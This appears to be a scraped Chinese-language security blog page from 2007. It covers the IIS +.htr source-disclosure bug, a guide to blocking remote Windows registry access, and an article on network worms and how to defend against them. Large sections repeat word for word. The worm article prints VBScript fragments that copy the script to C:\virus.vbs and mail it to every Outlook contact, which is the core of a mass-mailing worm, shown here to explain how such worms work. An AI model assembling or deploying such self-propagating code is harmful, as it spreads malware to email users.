第二種攻擊方式也很普遍,就是會影響ASP和Java網頁的暴露原始碼漏洞。 最晚被發現的安全漏洞是 +.htr 臭蟲,這個bug會顯示ASP原始碼。 如果有人利用這個漏洞攻擊,就會在IIS的記錄文件里面留下這些線索:
17:50:13 11.1.2.80 GET /default.asp+.htr 200
網頁常會只讓有權限的使用者進入。接下來我們要讓各位看 Apache的access_log記錄文件會在登錄失敗時留下什么線索:
12.1.2.8 - user [08/Mar/2001:18:58:29 -0700] "GET /private/ HTTP/1.0" 401 462
注:第三欄里面的使用者名稱是「user」。還有要注意HTTP的狀態代號是401,代表非法存取。
阻止攻擊者對Windows注冊表的遠程訪問
[ 2007-03-25 03:58:37 | 作者: sun ]
按照本文中所提及的方式保護Windows注冊表,能夠防止攻擊者遠程攻擊它。
問題
注冊表是Windows操作系統的核心。但是在缺省情況下,所有基于Windows的計算機的注冊表在網絡上都是可以被訪問到。了解這一點的黑客完全可以利用這個安全漏洞來對你的公司的計算機系統進行攻擊,并修改文件關系,并允許插入惡意代碼。為了保護你的網絡,你需要禁止對注冊表的遠程訪問。
解決方案
你輕而易舉地可以通過修改網絡訪問清單來達到這一目標。根據你網絡的復雜程度,你可能需要考慮禁止對注冊表的遠程訪問。
注意
編輯注冊表可能會有風險,所以必須要在開始之前確保你已經對注冊表進行了備份。
修改注冊表
對于使用Windows 2000、Windows XP、和Windows Server 2003系統的計算機,采取如下步驟:
1、點擊“開始”菜單,選擇“運行”。
2、輸入“Regedt32.exe”,然后點擊“OK”。
3、選擇“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurePipeServers”。
4、如果winreg鍵已經存在,跳到步驟8。如果該鍵不存在,點擊“編輯”菜單,選擇“添加”。
5、把該鍵命名為“winreg”,類別設定為REG_SZ。
6、選擇這個新創建的鍵,然后點擊“編輯”菜單,選擇“增加值“。
7、進行如下輸入:
名稱: Description
類型: REG_SZ
值 : Registry Server
8、選擇winreg鍵,進入安全 | 許可 。
9、確保本地系統管理員組(System Administrators Group)擁有全部的訪問權,把只讀權限開放給系統帳戶(System account)和所有人組(Everyone group)。
10、關閉注冊表編輯器,重新啟動計算機。
如果你為工作站或者服務器支持設定了特殊的組,而這些組的成員又不是管理員,你就應該也為他們設定合適的權限。
而且,如果你面對的機器是一臺服務器或者是一臺為特殊用戶提供遠程服務的計算機,你就必須允許有權使用服務的帳戶對相關內容有只讀的權限。
調整網絡
注冊表修改能夠保護你內部網絡需要經過授權才能訪問,但是你還需要保護注冊表不受外部的來自互聯網的訪問。利用注冊表的安全漏洞對Windows系統進行攻擊仍然非常普遍,所以你需要保證你的安全策略已經很好地解決了這些安全漏洞。
在前端的路由器或者防火墻上禁用TCP/UDP端口135、137、138、139和455是一個不錯的解決方法。禁用這些端口不僅僅是能夠阻止遠程訪問注冊表,這樣做還能夠阻止大部分針對Windows系統的遠程攻擊。
關閉這些端口迅速提高你的Windows網絡的安全性,在沒有禁用這些端口之前,你需要確認是否有商業的原因需要保持這些端口的開放。
這些是你所能夠關閉的、運行Windows 2000、Windows XP和Windows Server 2003系統上的遠程注冊表服務(Remote Registry),這對于企業來說,永遠是一個非常有幫助的、實用的方法。
問題
注冊表是Windows操作系統的核心。但是在缺省情況下,所有基于Windows的計算機的注冊表在網絡上都是可以被訪問到。了解這一點的黑客完全可以利用這個安全漏洞來對你的公司的計算機系統進行攻擊,并修改文件關系,并允許插入惡意代碼。為了保護你的網絡,你需要禁止對注冊表的遠程訪問。
解決方案
你輕而易舉地可以通過修改網絡訪問清單來達到這一目標。根據你網絡的復雜程度,你可能需要考慮禁止對注冊表的遠程訪問。
注意
編輯注冊表可能會有風險,所以必須要在開始之前確保你已經對注冊表進行了備份。
修改注冊表
對于使用Windows 2000、Windows XP、和Windows Server 2003系統的計算機,采取如下步驟:
1、點擊“開始”菜單,選擇“運行”。
2、輸入“Regedt32.exe”,然后點擊“OK”。
3、選擇“HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurePipeServers”。
4、如果winreg鍵已經存在,跳到步驟8。如果該鍵不存在,點擊“編輯”菜單,選擇“添加”。
5、把該鍵命名為“winreg”,類別設定為REG_SZ。
6、選擇這個新創建的鍵,然后點擊“編輯”菜單,選擇“增加值“。
7、進行如下輸入:
名稱: Description
類型: REG_SZ
值 : Registry Server
8、選擇winreg鍵,進入安全 | 許可 。
9、確保本地系統管理員組(System Administrators Group)擁有全部的訪問權,把只讀權限開放給系統帳戶(System account)和所有人組(Everyone group)。
10、關閉注冊表編輯器,重新啟動計算機。
如果你為工作站或者服務器支持設定了特殊的組,而這些組的成員又不是管理員,你就應該也為他們設定合適的權限。
而且,如果你面對的機器是一臺服務器或者是一臺為特殊用戶提供遠程服務的計算機,你就必須允許有權使用服務的帳戶對相關內容有只讀的權限。
調整網絡
注冊表修改能夠保護你內部網絡需要經過授權才能訪問,但是你還需要保護注冊表不受外部的來自互聯網的訪問。利用注冊表的安全漏洞對Windows系統進行攻擊仍然非常普遍,所以你需要保證你的安全策略已經很好地解決了這些安全漏洞。
在前端的路由器或者防火墻上禁用TCP/UDP端口135、137、138、139和455是一個不錯的解決方法。禁用這些端口不僅僅是能夠阻止遠程訪問注冊表,這樣做還能夠阻止大部分針對Windows系統的遠程攻擊。
關閉這些端口迅速提高你的Windows網絡的安全性,在沒有禁用這些端口之前,你需要確認是否有商業的原因需要保持這些端口的開放。
這些是你所能夠關閉的、運行Windows 2000、Windows XP和Windows Server 2003系統上的遠程注冊表服務(Remote Registry),這對于企業來說,永遠是一個非常有幫助的、實用的方法。
解析并防范電腦蠕蟲病毒
[ 2007-03-25 03:58:26 | 作者: sun ]
凡能夠引起計算機故障,破壞計算機數據的程序統稱為計算機病毒。所以從這個意義上說,蠕蟲也是一種病毒!網絡蠕蟲病毒,作為對互聯網危害嚴重的 一種計算機程序,其破壞力和傳染性不容忽視。與傳統的病毒不同,蠕蟲病毒以計算機為載體,以網絡為攻擊對象!本文中將蠕蟲病毒分為針對企業網絡和個人用戶2類,并從企業用戶和個人用戶兩個方面探討蠕蟲病毒的特征和一些防范措施!
本文根據蠕蟲病毒的發作機制,將其分為利用系統級別漏洞(主動傳播)和利用社會工程學(欺騙傳播)兩種,并從用戶角度中將蠕蟲病毒分為針對企業網絡和個人用戶2類,從企業用戶和個人用戶兩個方面探討蠕蟲病毒的特征和一些防范措施!
一、蠕蟲病毒的定義
1.蠕蟲病毒的定義
計算機病毒自出現之日起,就成為計算機的一個巨大威脅,而當網絡迅速發展的時候,蠕蟲病毒引起的危害開始顯現!從廣義上定義,凡能夠引起計算機故障,破壞計算機數據的程序統稱為計算機病毒。所以從這個意義上說,蠕蟲也是一種病毒!但是蠕蟲病毒和一般的病毒有著很大的區別。對于蠕蟲,現在還沒有一個成套的理論體系,一般認為,蠕蟲是一種通過網絡傳播的惡性病毒,它具有病毒的一些共性,如傳播性,隱蔽性,破壞性等等,同時具有自己的一些特征,如不利用文件寄生(有的只存在于內存中),對網絡造成拒絕服務,以及和黑客技術相結合等等!在產生的破壞性上,蠕蟲病毒也不是普通病毒所能比擬的,網絡的發展使得蠕蟲可以在短短的時間內蔓延整個網絡,造成網絡癱瘓!
根據使用者情況可將蠕蟲病毒分為2類,一種是面向企業用戶和局域網而言,這種病毒利用系統漏洞,主動進行攻擊,可以對整個互聯網可造成癱瘓性的后果!以“紅色代碼”,“尼姆達”,以及最新的“sql蠕蟲王”為代表。另外一種是針對個人用戶的,通過網絡(主要是電子郵件,惡意網頁形式)迅速傳播的蠕蟲病毒,以愛蟲病毒,求職信病毒為例.在這兩類中,第一類具有很大的主動攻擊性,而且爆發也有一定的突然性,但相對來說,查殺這種病毒并不是很難。第二種病毒的傳播方式比較復雜和多樣,少數利用了微軟的應用程序的漏洞,更多的是利用社會工程學()對用戶進行欺騙和誘使,這樣的病毒造成的損失是非常大的,同時也是很難根除的,比如求職信病毒,在2001年就已經被各大殺毒廠商發現,但直到2002年底依然排在病毒危害排行榜的首位就是證明!出得在接下來的內容中,將分別分析這兩種病毒的一些特征及防范措施!
2.蠕蟲病毒與一般病毒的異同
蠕蟲也是一種病毒,因此具有病毒的共同特征。一般的病毒是需要的寄生的,它可以通過自己指令的執行,將自己的指令代碼寫到其他程序的體內,而被感染的文件就被稱為”宿主”,例如,windows下可執行文件的格式為pe格式(Portable Executable),當需要感染pe文件時,在宿主程序中,建立一個新節,將病毒代碼寫到新節中,修改的程序入口點等,這樣,宿主程序執行的時候,就可以先執行病毒程序,病毒程序運行完之后,在把控制權交給宿主原來的程序指令。可見,病毒主要是感染文件,當然也還有像DIRII這種鏈接型病毒,還有引導區病毒。引導區病毒他是感染磁盤的引導區,如果是軟盤被感染,這張軟盤用在其他機器上后,同樣也會感染其他機器,所以傳播方式也是用軟盤等方式。
蠕蟲一般不采取利用pe格式插入文件的方法,而是復制自身在互聯網環境下進行傳播,病毒的傳染能力主要是針對計算機內的文件系統而言,而蠕蟲病毒的傳染目標是互聯網內的所有計算機.局域網條件下的共享文件夾,電子郵件email,網絡中的惡意網頁,大量存在著漏洞的服務器等都成為蠕蟲傳播的良好途徑。網絡的發展也使得蠕蟲病毒可以在幾個小時內蔓延全球!而且蠕蟲的主動攻擊性和突然爆發性將使得人們手足無策!
普通病毒 蠕蟲病毒
存在形式 寄存文件 獨立程序
傳染機制 宿主程序運行 主動攻擊
傳染目標 本地文件 網絡計算機
可以預見,未來能夠給網絡帶來重大災難的主要必定是網絡蠕蟲!
3.蠕蟲的破壞和發展趨勢
1988年一個由美國CORNELL大學研究生莫里斯編寫的蠕蟲病毒蔓延造成了數千臺計算機停機,蠕蟲病毒開始現身網絡;而后來的紅色代碼,尼姆達病毒瘋狂的時候,造成幾十億美元的損失;北京時間2003年1月26日, 一種名為“2003蠕蟲王”的電腦病毒迅速傳播并襲擊了全球,致使互聯網網路嚴重堵塞,作為互聯網主要基礎的域名服務器(DNS)的癱瘓造成網民瀏覽互聯網網頁及收發電子郵件的速度大幅減緩,同時銀行自動提款機的運作中斷, 機票等網絡預訂系統的運作中斷,信用卡等收付款系統出現故障!專家估計,此病毒造成的直接經濟損失至少在12億美元以上!
病毒名稱 持續時間 造成損失莫里斯蠕蟲 1988年
6000多臺計算機停機,直接經濟損失達9600萬美元! 美麗殺手
1999年 政府部門和一些大公司緊急關閉了網絡服務器,
經濟損失超過12億美元!愛蟲病毒
2000年5月至今
眾多用戶電腦被感染,損失超過100億美元以上 紅色代碼
2001年7月 網絡癱瘓,直接經濟損失超過26億美元 求職信
2001年12月至今 大量病毒郵件堵塞服務器,損失達數百億美元 蠕蟲王
2003年1月 網絡大面積癱瘓,銀行自動提款機運做中斷,直接經濟損失超過26億美元
由表可以知道,蠕蟲病毒對網絡產生堵塞作用,并造成了巨大的經濟損失!
通過對以上蠕蟲病毒的分析,可以知道,蠕蟲發作的一些特點和發展趨勢:
1.利用操作系統和應用程序的漏洞主動進行攻擊.. 此類病毒主要是“紅色代碼”和“尼姆達”,以及至今依然肆虐的”求職信”等.由于IE瀏覽器的漏洞(Iframe Execcomand),使得感染了“尼姆達”病毒的郵件在不去手工打開附件的情況下病毒就能激活,而此前即便是很多防病毒專家也一直認為,帶有病毒附件的郵件,只要不去打開附件,病毒不會有危害。“紅色代碼”是利用了微軟IIS服務器軟件的漏洞(idq.dll遠程緩存區溢出)來傳播。Sql蠕蟲王病毒則是利用了微軟的數據庫系統的一個漏洞進行大肆攻擊!
2.傳播方式多樣 如“尼姆達”病毒和”求職信”病毒,可利用的傳播途徑包括文件、電子郵件、Web服務器、網絡共享等等。
3.病毒制作技術與傳統的病毒不同的是,許多新病毒是利用當前最新的編程語言與編程技術實現的,易于修改以產生新的變種,從而逃避反病毒軟件的搜索。另外,新病毒利用Java、ActiveX、VB Script等技術,可以潛伏在HTML頁面里,在上網瀏覽時觸發。
4.與黑客技術相結合! 潛在的威脅和損失更大!以紅色代碼為例,感染后的機器的web目錄的\scripts下將生成一個root.exe,可以遠程執行任何命令,從而使黑客能夠再次進入!二、網絡蠕蟲病毒分析和防范
蠕蟲和普通病毒不同的一個特征是蠕蟲病毒往往能夠利用漏洞,這里的漏洞或者說是缺陷,我們分為2種,軟件上的缺陷和人為上的缺陷。軟件上的缺陷,如遠程溢出,微軟ie和outlook的自動執行漏洞等等,需要軟件廠商和用戶共同配合,不斷的升級軟件。而人為的缺陷,主要是指的是計算機用戶的疏忽。這就是所謂的社會工程學(social engineering),當收到一封郵件帶著病毒的求職信郵件時候,大多數人都會報著好奇去點擊的。對于企業用戶來說,威脅主要集中在服務器和大型應用軟件的安全上,而個人用戶而言,主要是防范第二種缺陷。
1.利用系統漏洞的惡性蠕蟲病毒分析
在這種病毒中,以紅色代碼,尼姆達和sql蠕蟲為代表!他們共同的特征是利用微軟服務器和應用程序組件的某個漏洞進行攻擊,由于網上存在這樣的漏洞比較普遍,使得病毒很容易的傳播!而且攻擊的對象大都為服務器,所以造成的網絡堵塞現象嚴重!
以2003年1月26號爆發的sql蠕蟲為例,爆發數小時內席卷了全球網絡,造成網絡大塞車.亞洲國家中以人口上網普及率達七成的韓國所受影響較為嚴重。韓國兩大網絡業KFT及***電訊公司,系統都陷入了癱瘓,其它的網絡用戶也被迫斷線,更為嚴重的是許多銀行的自動取款機都無法正常工作, 美國許美國銀行統計,該行的13000臺自動柜員機已經無法提供正常提款。網絡蠕蟲病毒開始對人們的生活產生了巨大的影響!
這次sql蠕蟲攻擊的是微軟數據庫系Microsoft SQL Server 2000的,利用了MSSQL2000服務遠程堆棧緩沖區溢出漏洞, Microsoft SQL Server 2000是一款由Microsoft公司開發的商業性質大型數據庫系統。SQL Server監聽UDP的1434端口,客戶端可以通過發送消息到這個端口來查詢目前可用的連接方式(連接方式可以是命名管道也可以是TCP),但是此程序存在嚴重漏洞,當客戶端發送超長數據包時,將導致緩沖區溢出,黑客可以利用該漏洞在遠程機器上執行自己的惡意代碼。
微軟在200年7月份的時候就為這個漏洞發布了一個安全公告,但當sql蠕蟲爆發的時候,依然有大量的裝有ms sqlserver 2000的服務器沒有安裝最新的補丁,從而被蠕蟲病毒所利用,蠕蟲病毒通過一段376個字節的惡意代碼,遠程獲得對方主機的系統控制權限, 取得三個Win32 API地址,GetTickCount、socket、sendto,接著病毒使用GetTickCount獲得一個隨機數,進入一個死循環繼續傳播。在該循環中蠕蟲使用獲得的隨機數生成一個隨機的ip地址,然后將自身代碼發送至1434端口(Microsoft SQL Server開放端口),該蠕蟲傳播速度極快,其使用廣播數據包方式發送自身代碼,每次均攻擊子網中所有255臺可能存在機器。由于這是一個死循環的過程,發包密度僅和機器性能和網絡帶寬有關,所以發送的數據量非常大。該蠕蟲對被感染機器本身并沒有進行任何惡意破壞行為,也沒有向硬盤上寫文件,僅僅存在與內存中。對于感染的系統,重新啟動后就可以清除蠕蟲,但是仍然會重復感染。由于發送數據包占用了大量系統資源和網絡帶寬,形成Udp Flood,感染了該蠕蟲的網絡性能會極度下降。一個百兆網絡內只要有一兩臺機器感染該蠕蟲就會導致整個網絡訪問阻塞。
通過以上分析可以知道,此蠕蟲病毒本身除了對網絡產生拒絕服務攻擊外,并沒有別的破壞措施.但如果病毒編寫者在編寫病毒的時候加入破壞代碼,后果將不堪設想!
2.企業防范蠕蟲病毒措施
此次sql蠕蟲病毒,利用的漏洞在2002年7月份微軟的一份安全公告中就有詳細說明!而且微軟也提供了安全補丁提供下載,然而在時隔半年之后互聯網上還有相當大的一部分服務器沒有安裝最新的補丁,其網絡管理員的安全防范意識可見一斑!
當前,企業網絡主要應用于文件和打印服務共享、辦公自動化系統、企業業務(MIS)系統、Internet應用等領域。網絡具有便利信息交換特性,蠕蟲病毒也可以充分利用網絡快速傳播達到其阻塞網絡目的。企業在充分地利用網絡進行業務處理時,就不得不考慮企業的病毒防范問題,以保證關系企業命運的業務數據完整不被破壞。
企業防治蠕蟲病毒的時候需要考慮幾個問題:病毒的查殺能力,病毒的監控能力,新病毒的反應能力。而企業防毒的一個重要方面是是管理和策略。推薦的企業防范蠕蟲病毒的策略如下:
(1)加強網絡管理員安全管理水平,提高安全意識。由于蠕蟲病毒利用的是系統漏洞進行攻擊,所以需要在第一時間內保持系統和應用軟件的安全性,保持各種操作系統和應用軟件的更新!由于各種漏洞的出現,使得安全不在是一種一勞永逸的事,而作為企業用戶而言,所經受攻擊的危險也是越來越大,要求企業的管理水平和安全意識也越來越高!
(2)建立病毒檢測系統。能夠在第一時間內檢測到網絡異常和病毒攻擊。
(3)建立應急響應系統,將風險減少到最小!由于蠕蟲病毒爆發的突然性,可能在病毒發現的時候已經蔓延到了整個網絡,所以在突發情況下,建立一個緊急響應系統是很有必要的,在病毒爆發的第一時間即能提供解決方案。
(4)建立災難備份系統。對于數據庫和數據系統,必須采用定期備份,多機備份措施,防止意外災難下的數據丟失!
(5)對于局域網而言,可以采用以下一些主要手段:A.在因特網接入口處安裝防火墻式防殺計算機病毒產品,將病毒隔離在局域網之外。B.對郵件服務器進行監控,防止帶毒郵件進行傳播!C.對局域網用戶進行安全培訓。D.建立局域網內部的升級系統,包括各種操作系統的補丁升級,各種常用的應用軟件升級,各種殺毒軟件病毒庫的升級等等!3.對個人用戶產生直接威脅的蠕蟲病毒
在以上分析的蠕蟲病毒中,只對安裝了特定的微軟組件的系統進行攻擊,而對廣大個人用戶而言,是不會安裝iis(微軟的因特網服務器程序,可以使允許在網上提供web服務)或者是龐大的數據庫系統的!因此上述病毒并不會直接攻擊個個人用戶的電腦(當然能夠間接的通過網絡產生影響),但接下來分析的蠕蟲病毒,則是對個人用戶威脅最大,同時也是最難以根除,造成的損失也更大的一類蠕蟲病毒!
對于個人用戶而言,威脅大的蠕蟲病毒采取的傳播方式一般為電子郵件(Email)以及惡意網頁等等!
對于利用email傳播得蠕蟲病毒來說,通常利用的是社會工程學(Social Engineering),即以各種各樣的欺騙手段那誘惑用戶點擊的方式進行傳播!
惡意網頁確切的講是一段黑客破壞代碼程序,它內嵌在網頁中,當用戶在不知情的情況下打開含有病毒的網頁時,病毒就會發作。這種病毒代碼鑲嵌技術的原理并不復雜,所以會被很多懷不良企圖者利用,在很多黑客網站竟然出現了關于用網頁進行破壞的技術的論壇,并提供破壞程序代碼下載,從而造成了惡意網頁的大面積泛濫,也使越來越多的用戶遭受損失。
對于惡意網頁,常常采取vb script和java script編程的形式!由于編程方式十分的簡單!所以在網上非常的流行!
Vb script和java script是由微軟操作系統的wsh(Windows Scripting HostWindows腳本主機)解析并執行的,由于其編程非常簡單,所以此類腳本病毒在網上瘋狂傳播,瘋狂一時的愛蟲病毒就是一種vbs腳本病毒,然后偽裝成郵件附件誘惑用戶點擊運行,更為可怕的是,這樣的病毒是以源代碼的形式出現的,只要懂得一點關于腳本編程的人就可以修改其代碼,形成各種各樣的變種。
下面以一個簡單的腳本為例:
Set objFs=CreateObject (“Scripting.FileSystemObject”)
(創建一個文件系統對象)objFs.CreateTextFile ("C:\virus.txt", 1)
(通過文件系統對象的方法創建了TXT文件)
如果我們把這兩句話保存成為.vbs的VB腳本文件,點擊就會在C盤中創建一個TXT文件了。倘若我們把第二句改為:
objFs.GetFile (WScript.ScriptFullName).Copy ("C:\virus.vbs")
就可以將自身復制到C盤virus.vbs這個文件。本句前面是打開這個腳本文件,WScript.ScriptFullName指明是這個程序本身,是一個完整的路徑文件名。GetFile函數獲得這個文件,Copy函數將這個文件復制到C盤根目錄下virus.vbs這個文件。這么簡單的兩句就實現了自我復制的功能,已經具備病毒的基本特征——自我復制能力。
此類病毒往往是通過郵件傳播的,在vb script中調用郵件發送功能也非常的簡單,病毒往往采用的方法是向outlook中的地址薄中的郵件地址發送帶有包含自身的郵件來達到傳播目的,一個簡單的實例如下:
Set objOA=Wscript.CreateObject ("Outlook.Application")
(創建一個OUTLOOK應用的對象)Set objMapi=objOA.GetNameSpace ("MAPI")
(取得MAPI名字空間)For i=1 to objMapi.AddressLists.Count(遍歷地址簿)
Set objAddList=objMapi.AddressLists (i)
For j=1 To objAddList. AddressEntries.Count Set
objMail=objOA.CreateItem (0) objMail.Recipients.Add
(objAddList. AddressEntries
(j))
(取得收件人郵件地址 )objMail.Subject="你好!"
(設置郵件主題,這個往往具有很大的誘惑性質)
objMail.Body="這次給你的附件,是我的新文檔!"
(設置信件內容)objMail.Attachments.Add (“c:\virus.vbs")
(把自己作為附件擴散出去 )objMail.Send(發送郵件)
NextNext Set objMapi=Nothing(清空objMapi變量,釋放資源)
set objOA=Nothing(清空objOA變量)
這一小段代碼的功能是向地址簿中的用戶發送電子郵件,并將自己作為附件擴散出去。這段代碼中的第一行是創建一個Outlook的對象,是必不可少的。在其下是一個循環,在循環中不斷地向地址簿中的電子郵件地址發送內容相同的信件。這就是蠕蟲的傳播性。
由此可以看出,利用vb script編寫病毒是非常容易的,這就使得此類病毒的變種繁多,破壞力極大,同時也是非常難以根除的!
4.個人用戶對蠕蟲病毒的防范措施
通過上述的分析,我們可以知道,病毒并不是非常可怕的,網絡蠕蟲病毒對個人用戶的攻擊主要還是通過社會工程學,而不是利用系統漏洞!所以防范此類病毒需要注意以下幾點:
(1)購合適的殺毒軟件!網絡蠕蟲病毒的發展已經使傳統的殺毒軟件的“文件級實時監控系統”落伍,殺毒軟件必須向內存實時監控和郵件實時監控發展!另外面對防不勝防的網頁病毒,也使得用戶對殺毒軟件的要求越來越高!在殺毒軟件市場上,賽門鐵克公司的norton系列殺毒軟件在全球具有很大的比例!經過多項測試,norton殺毒系列軟件腳本和蠕蟲阻攔技術能夠阻擋大部分電子郵件病毒,而且對網頁病毒也有相當強的防范能力!目前國內的殺毒軟件也具有了相當高的水平。像瑞星,kv系列等殺毒軟件,在殺毒軟件的同時整合了防火強功能,從而對蠕蟲兼木馬程序有很大克制作用。
(2)經常升級病毒庫,殺毒軟件對病毒的查殺是以病毒的特征碼為依據的,而病毒每天都層出不窮,尤其是在網絡時代,蠕蟲病毒的傳播速度快,變種多,所以必須隨時更新病毒庫,以便能夠查殺最新的病毒!
(3)提高防殺毒意識.不要輕易去點擊陌生的站點,有可能里面就含有惡意代碼!
當運行IE時,點擊“工具→Internet選項→安全→ Internet區域的安全級別”,把安全級別由“中”改為“高” 。因為這一類網頁主要是含有惡意代碼的ActiveX或Applet、 JavaScript的網頁文件 ,所以在IE設置中將ActiveX插件和控件、Java腳本等全部禁止就可以大大減少被網頁惡意代碼感染的幾率。具體方案是:在IE窗口中點擊“工具”→“Internet選項”,在彈出的對話框中選擇“安全”標簽,再點擊“自定義級別”按鈕,就會彈出“安全設置”對話框,把其中所有ActiveX插件和控件以及與Java相關全部選項選擇“禁用”。但是,這樣做在以后的網頁瀏覽過程中有可能會使一些正常應用ActiveX的網站無法瀏覽。
(4)不隨意查看陌生郵件,尤其是帶有附件的郵件,由于有的病毒郵件能夠利用ie和outlook的漏洞自動執行,所以計算機用戶需要升級ie和outlook程序,及常用的其他應用程序!
三、小結
網絡蠕蟲病毒作為一種互聯網高速發展下的一種新型病毒,必將對網絡產生巨大的危險。在防御上,已經不再是由單獨的殺毒廠商所能夠解決,而需要網絡安全公司,系統廠商,防病毒廠商及用戶共同參與,構筑全方位的防范體系!
蠕蟲和黑客技術的結合,使得對蠕蟲的分析,檢測和防范具有一定的難度,同時對蠕蟲的網絡傳播性,網絡流量特性建立數學模型也是有待研究的工作!
本文根據蠕蟲病毒的發作機制,將其分為利用系統級別漏洞(主動傳播)和利用社會工程學(欺騙傳播)兩種,并從用戶角度中將蠕蟲病毒分為針對企業網絡和個人用戶2類,從企業用戶和個人用戶兩個方面探討蠕蟲病毒的特征和一些防范措施!
一、蠕蟲病毒的定義
1.蠕蟲病毒的定義
計算機病毒自出現之日起,就成為計算機的一個巨大威脅,而當網絡迅速發展的時候,蠕蟲病毒引起的危害開始顯現!從廣義上定義,凡能夠引起計算機故障,破壞計算機數據的程序統稱為計算機病毒。所以從這個意義上說,蠕蟲也是一種病毒!但是蠕蟲病毒和一般的病毒有著很大的區別。對于蠕蟲,現在還沒有一個成套的理論體系,一般認為,蠕蟲是一種通過網絡傳播的惡性病毒,它具有病毒的一些共性,如傳播性,隱蔽性,破壞性等等,同時具有自己的一些特征,如不利用文件寄生(有的只存在于內存中),對網絡造成拒絕服務,以及和黑客技術相結合等等!在產生的破壞性上,蠕蟲病毒也不是普通病毒所能比擬的,網絡的發展使得蠕蟲可以在短短的時間內蔓延整個網絡,造成網絡癱瘓!
根據使用者情況可將蠕蟲病毒分為2類,一種是面向企業用戶和局域網而言,這種病毒利用系統漏洞,主動進行攻擊,可以對整個互聯網可造成癱瘓性的后果!以“紅色代碼”,“尼姆達”,以及最新的“sql蠕蟲王”為代表。另外一種是針對個人用戶的,通過網絡(主要是電子郵件,惡意網頁形式)迅速傳播的蠕蟲病毒,以愛蟲病毒,求職信病毒為例.在這兩類中,第一類具有很大的主動攻擊性,而且爆發也有一定的突然性,但相對來說,查殺這種病毒并不是很難。第二種病毒的傳播方式比較復雜和多樣,少數利用了微軟的應用程序的漏洞,更多的是利用社會工程學()對用戶進行欺騙和誘使,這樣的病毒造成的損失是非常大的,同時也是很難根除的,比如求職信病毒,在2001年就已經被各大殺毒廠商發現,但直到2002年底依然排在病毒危害排行榜的首位就是證明!出得在接下來的內容中,將分別分析這兩種病毒的一些特征及防范措施!
2.蠕蟲病毒與一般病毒的異同
蠕蟲也是一種病毒,因此具有病毒的共同特征。一般的病毒是需要的寄生的,它可以通過自己指令的執行,將自己的指令代碼寫到其他程序的體內,而被感染的文件就被稱為”宿主”,例如,windows下可執行文件的格式為pe格式(Portable Executable),當需要感染pe文件時,在宿主程序中,建立一個新節,將病毒代碼寫到新節中,修改的程序入口點等,這樣,宿主程序執行的時候,就可以先執行病毒程序,病毒程序運行完之后,在把控制權交給宿主原來的程序指令。可見,病毒主要是感染文件,當然也還有像DIRII這種鏈接型病毒,還有引導區病毒。引導區病毒他是感染磁盤的引導區,如果是軟盤被感染,這張軟盤用在其他機器上后,同樣也會感染其他機器,所以傳播方式也是用軟盤等方式。
蠕蟲一般不采取利用pe格式插入文件的方法,而是復制自身在互聯網環境下進行傳播,病毒的傳染能力主要是針對計算機內的文件系統而言,而蠕蟲病毒的傳染目標是互聯網內的所有計算機.局域網條件下的共享文件夾,電子郵件email,網絡中的惡意網頁,大量存在著漏洞的服務器等都成為蠕蟲傳播的良好途徑。網絡的發展也使得蠕蟲病毒可以在幾個小時內蔓延全球!而且蠕蟲的主動攻擊性和突然爆發性將使得人們手足無策!
普通病毒 蠕蟲病毒
存在形式 寄存文件 獨立程序
傳染機制 宿主程序運行 主動攻擊
傳染目標 本地文件 網絡計算機
可以預見,未來能夠給網絡帶來重大災難的主要必定是網絡蠕蟲!
3.蠕蟲的破壞和發展趨勢
1988年一個由美國CORNELL大學研究生莫里斯編寫的蠕蟲病毒蔓延造成了數千臺計算機停機,蠕蟲病毒開始現身網絡;而后來的紅色代碼,尼姆達病毒瘋狂的時候,造成幾十億美元的損失;北京時間2003年1月26日, 一種名為“2003蠕蟲王”的電腦病毒迅速傳播并襲擊了全球,致使互聯網網路嚴重堵塞,作為互聯網主要基礎的域名服務器(DNS)的癱瘓造成網民瀏覽互聯網網頁及收發電子郵件的速度大幅減緩,同時銀行自動提款機的運作中斷, 機票等網絡預訂系統的運作中斷,信用卡等收付款系統出現故障!專家估計,此病毒造成的直接經濟損失至少在12億美元以上!
病毒名稱 持續時間 造成損失莫里斯蠕蟲 1988年
6000多臺計算機停機,直接經濟損失達9600萬美元! 美麗殺手
1999年 政府部門和一些大公司緊急關閉了網絡服務器,
經濟損失超過12億美元!愛蟲病毒
2000年5月至今
眾多用戶電腦被感染,損失超過100億美元以上 紅色代碼
2001年7月 網絡癱瘓,直接經濟損失超過26億美元 求職信
2001年12月至今 大量病毒郵件堵塞服務器,損失達數百億美元 蠕蟲王
2003年1月 網絡大面積癱瘓,銀行自動提款機運做中斷,直接經濟損失超過26億美元
由表可以知道,蠕蟲病毒對網絡產生堵塞作用,并造成了巨大的經濟損失!
通過對以上蠕蟲病毒的分析,可以知道,蠕蟲發作的一些特點和發展趨勢:
1.利用操作系統和應用程序的漏洞主動進行攻擊.. 此類病毒主要是“紅色代碼”和“尼姆達”,以及至今依然肆虐的”求職信”等.由于IE瀏覽器的漏洞(Iframe Execcomand),使得感染了“尼姆達”病毒的郵件在不去手工打開附件的情況下病毒就能激活,而此前即便是很多防病毒專家也一直認為,帶有病毒附件的郵件,只要不去打開附件,病毒不會有危害。“紅色代碼”是利用了微軟IIS服務器軟件的漏洞(idq.dll遠程緩存區溢出)來傳播。Sql蠕蟲王病毒則是利用了微軟的數據庫系統的一個漏洞進行大肆攻擊!
2.傳播方式多樣 如“尼姆達”病毒和”求職信”病毒,可利用的傳播途徑包括文件、電子郵件、Web服務器、網絡共享等等。
3.病毒制作技術與傳統的病毒不同的是,許多新病毒是利用當前最新的編程語言與編程技術實現的,易于修改以產生新的變種,從而逃避反病毒軟件的搜索。另外,新病毒利用Java、ActiveX、VB Script等技術,可以潛伏在HTML頁面里,在上網瀏覽時觸發。
4.與黑客技術相結合! 潛在的威脅和損失更大!以紅色代碼為例,感染后的機器的web目錄的\scripts下將生成一個root.exe,可以遠程執行任何命令,從而使黑客能夠再次進入!二、網絡蠕蟲病毒分析和防范
